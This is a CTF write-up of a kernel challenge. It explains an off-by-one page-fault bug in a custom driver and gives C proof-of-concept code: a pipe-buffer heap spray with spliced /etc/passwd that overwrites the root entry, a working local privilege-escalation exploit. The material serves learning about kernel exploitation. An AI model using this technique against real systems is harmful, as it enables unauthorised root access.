Faulty Kernel is a fun kernel challenge where I learned more about how drivers handle mmap'd memory.
When the device is opened, the driver allocates an array of page pointers that is 0x400 bytes in size and stores the resulting shared_buffer in filp->private_data.
static int dev_open(struct inode* inodep, struct file* filp) {
    int i;
    struct shared_buffer* sbuf;
    sbuf = kzalloc(sizeof(*sbuf), GFP_KERNEL);
    sbuf->pagecount = PAGECOUNT;
    // this is in kmalloc 0x400
    sbuf->pages = kmalloc_array(sbuf->pagecount, sizeof(*sbuf->pages), GFP_KERNEL);
    for (i = 0; i < sbuf->pagecount; i++) {
        // alloc_page also automatically set ref count to 1
        sbuf->pages[i] = alloc_page(GFP_KERNEL);
        if (!sbuf->pages[i]) {
            printk(KERN_ERR "[dev] Failed to allocate page %d.\n", i);
            goto fail_alloc_pages;
        }
    }
    filp->private_data = sbuf;
    return SUCCESS;
}
When we mmap the file descriptor returned by opening the device, dev_mmap sets up the vma with custom vm_ops and vm_private_data. Any later page fault on an address inside that vma is then handled by the driver's own fault hook.
static int dev_mmap(struct file* filp, struct vm_area_struct* vma) {
    struct shared_buffer* sbuf = filp->private_data;
    pgoff_t pages = vma_pages(vma);
    // ensure that the vma covers at most pagecount pages
    // (only the length is checked here, not vma->vm_pgoff)
    if (pages > sbuf->pagecount) {
        // mmapping a size > PAGECOUNT will error here
        return -EINVAL;
    }
    vma->vm_ops = &dev_vm_ops;
    vma->vm_private_data = sbuf;
    return SUCCESS;
}
The open and mmap handlers are registered in the driver's file_operations:
static struct file_operations dev_fops = {
    .owner = THIS_MODULE,
    .open = dev_open,
    .mmap = dev_mmap
};
And when we fault on an address inside the vma, dev_vma_fault runs:
static vm_fault_t dev_vma_fault(struct vm_fault *vmf) {
    struct vm_area_struct *vma = vmf->vma;
    struct shared_buffer *sbuf = vma->vm_private_data;
    pgoff_t pgoff = vmf->pgoff;
    // when pgoff > sbuf->pagecount, userland receives SIGBUS
    // BUG: off by one, pgoff == sbuf->pagecount passes this check
    if (pgoff > sbuf->pagecount) {
        return VM_FAULT_SIGBUS;
    }
    // else increment ref count of the page
    get_page(sbuf->pages[pgoff]);
    vmf->page = sbuf->pages[pgoff];
    return SUCCESS;
}
There is an off-by-one bug in the dev_vma_fault function. The check should abort when pgoff ≥ sbuf->pagecount, since indexing of the sbuf->pages array starts from 0 and the last valid index is pagecount - 1.
Example POC:
int main(void)
{
    int chal_fd = open("/dev/challenge", O_RDWR);
    // map the device at file offset 127 * 0x1000, so address 0x90000
    // corresponds to sbuf->pages[127] and 0x91000 to sbuf->pages[128]
    void* mapped_addr = SYSCHK(mmap((void*)0x90000, 10 * 0x1000,
                                    PROT_READ | PROT_WRITE,
                                    MAP_SHARED,
                                    chal_fd, (127 * 0x1000)));
    printf("mapped_addr: %p\n", mapped_addr);
    // one page in: pgoff = 127 + 1 = 128, which slips past the check
    // (assuming PAGECOUNT is 128; two pages in would give 129 and SIGBUS)
    int* ptr = (int*)((char*)mapped_addr + (1 * 0x1000));
    mygetch("set bp");
    *ptr = 42; // faults, then writes 42 into whatever "page" follows the array
    return 0;
}
What this gives us is an out-of-bounds read of the page array: the page fault triggered by *ptr above treats whatever 8 bytes follow the array as a page pointer and maps that page into our address space. If we can reliably place a page pointer right after the page array, we can write to that page! One thing to note is that the mapping must be VM_SHARED (MAP_SHARED). This is because finish_fault uses vmf->cow_page for a write fault on a mapping that is not VM_SHARED, while the buggy dev_vma_fault returns its out-of-bounds page in vmf->page. Hence, we need to take the second branch.
vm_fault_t finish_fault(struct vm_fault *vmf)
{
    struct page *page;
    vm_fault_t ret = 0;
    /* Did we COW the page? */
    if ((vmf->flags & FAULT_FLAG_WRITE) &&
        !(vmf->vma->vm_flags & VM_SHARED))
        // [1] write fault on a private mapping: a fresh copy is mapped instead
        page = vmf->cow_page;
    else
        // [2] the vmf->page is the one that is fake and went oob
        page = vmf->page;
    ...
}
Now we look at how the write works on a normal page array:
Exploit Overview:
- Open /dev/challenge to allocate the page array.
- Spray pipe buffers so that a pipe buffer sits below our page array. The pipe buffer array also happens to be allocated from 0x400, so it lands directly below the page array.
- Splice /etc/passwd so that its page is referenced by the pipe buffer directly beneath the page array. This is a technique that I learned from Dirty Pipe.
- Trigger a page fault and the oob bug to overwrite /etc/passwd.
POC
int main(void)
{
    pin_cpu(0);
    int secrets_fd = SYSCHK(open("/etc/passwd", O_RDONLY));
    struct stat stbuf;
    SYSCHK(stat("/etc/passwd", &stbuf)); // only needed for the file size
    printf("File size: %lld bytes\n", (long long)stbuf.st_size);
    printf("pipe pipe pipe!\n");
    int sprayer_pipes[0x30][2];
    int new_pipes[2];
    SYSCHK(pipe(new_pipes));
    uint64_t contents[0x1000/8];
    memset(contents, 0x41, 0x1000);
    int m_fd[0x10] = {0};
    // opening the device allocates the page array (0x400)
    for (int i = 0; i < 1; i++){
        m_fd[i] = open("/dev/challenge", O_RDWR);
    }
    // spray pipes so that a pipe buffer array lands right below the page array
    for (int i = 0; i < 0x10; i++) {
        if (pipe(sprayer_pipes[i]) < 0){
            printf("Pipe err");
            exit(EXIT_FAILURE);
        }
    }
    off_t offset = 1;
    SYSCHK(splice(secrets_fd, &offset, new_pipes[1], NULL, (long long)stbuf.st_size, 0));
    SYSCHK(write(new_pipes[1], contents, 0x1000));
    memset(contents, 0x42, 0x1000);
    SYSCHK(write(new_pipes[1], contents, 0x1000));
    // splice /etc/passwd into every sprayed pipe so that the first slot of
    // each pipe buffer references the file's page
    for (int i = 0; i < 0x10; i++){
        offset = 0;
        SYSCHK(splice(secrets_fd, &offset, sprayer_pipes[i][1], NULL, (long long)stbuf.st_size, 0));
        SYSCHK(write(sprayer_pipes[i][1], contents, 0x1000));
        SYSCHK(write(sprayer_pipes[i][1], contents, 0x1000));
    }
    // file offset 128 * 0x1000: the first page of the mapping is sbuf->pages[128]
    void* mapped_addr = SYSCHK(mmap((void*)0x90000, 10 * 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, m_fd[0], (128 * 0x1000)));
    printf("mapped_addr: %p\n", mapped_addr);
    const char* str = "root:$1$KHAVTUKO$GU3BysPeNf8W7hDrzo0bu/:0:0:root:/root:/bin/sh\nuser:x:1000:1000:Linux User,,,:/home/user:/bin/sh";
    // the write faults on pgoff 128 and lands in the spliced /etc/passwd page
    memcpy(mapped_addr, str, strlen(str) + 1); // +1 to include the null terminator
    system("cat /etc/passwd");
    // mygetch("Sleeping!");
    return 0;
}
Conclusion
After the CTF, the author mentioned that the intended way to exploit the bug was to use mremap to expand the vma. There should also have been a check on the pgoff in dev_mmap. He wrote the challenge based on the pattern described in the following blog: https://labs.bluefrostsecurity.de/blog/cve-2023-2008.html. Regardless, the challenge was fun, and I learned some new things!!